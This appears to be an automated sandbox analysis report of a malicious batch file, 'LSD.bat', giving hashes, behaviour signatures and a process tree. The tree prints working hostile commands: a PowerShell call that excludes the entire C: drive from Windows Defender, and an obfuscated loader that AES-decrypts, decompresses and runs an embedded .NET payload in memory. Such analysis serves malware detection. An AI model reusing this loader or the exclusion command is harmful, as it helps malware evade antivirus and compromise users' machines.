Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
-
submitted
25/08/2024, 17:21
General
-
Target
LSD.bat
-
Size
1.3MB
-
MD5
a9550f1c944a4bce9df986467e8c8065
-
SHA1
da6c3d1e0b74a372f36b757917f0e9ddbd9ef4c3
-
SHA256
b7e0820ac8d4ca27a84814f33838a9892aaaec76f8837e791d6bad95e6259529
-
SHA512
fa76880904d49ac990a6b1172cf4aaa71c6119c17ed8c7bf31a9922433499ba3630d554273b49467ad59678d5d348deb8d7ce55b1120b4972941609566a732ca
-
SSDEEP
24576:IGaUv+Fjs045DPskYT2fBgr5ewKfgqVjS59G26wl9OM9g+l6xjSHWwu5:L9+yPf+VeYG2tI1QMW2z
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Deletes itself 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\LSD.bat"1⤵
- Deletes itself
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org2⤵
-
-
C:\Windows\system32\findstr.exefindstr /C:"" blacklist.txt2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\\"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\LSD.bat.exe"LSD.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $YZrPtiYD = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\LSD.bat').Split([Environment]::NewLine);foreach ($uDpKXGuz in $YZrPtiYD) { if ($uDpKXGuz.StartsWith(':: ')) { $TsoLQbVY = $uDpKXGuz.Substring(3); break; }; };$DLhtmrSl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($TsoLQbVY);$MmDnIeCf = New-Object System.Security.Cryptography.AesManaged;$MmDnIeCf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$MmDnIeCf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$MmDnIeCf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UJKza9U4IyboVW3XkY78xdElsdzOf0qDcphsexgwGg=');$MmDnIeCf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IHByTY43CTggzzH1HZVtxA==');$DUzPrnIo = $MmDnIeCf.CreateDecryptor();$DLhtmrSl = $DUzPrnIo.TransformFinalBlock($DLhtmrSl, 0, $DLhtmrSl.Length);$DUzPrnIo.Dispose();$MmDnIeCf.Dispose();$jGyEbXKQ = New-Object System.IO.MemoryStream(, $DLhtmrSl);$HlKcPZxE = New-Object System.IO.MemoryStream;$foNXcIsL = New-Object System.IO.Compression.GZipStream($jGyEbXKQ, [IO.Compression.CompressionMode]::Decompress);$foNXcIsL.CopyTo($HlKcPZxE);$foNXcIsL.Dispose();$jGyEbXKQ.Dispose();$HlKcPZxE.Dispose();$DLhtmrSl = $HlKcPZxE.ToArray();$AMliJFTS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($DLhtmrSl);$KtZnRMID = $AMliJFTS.EntryPoint;$KtZnRMID.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
412KB
-
Filesize
12KB
-
Filesize
9.6MB
-
Filesize
9.6MB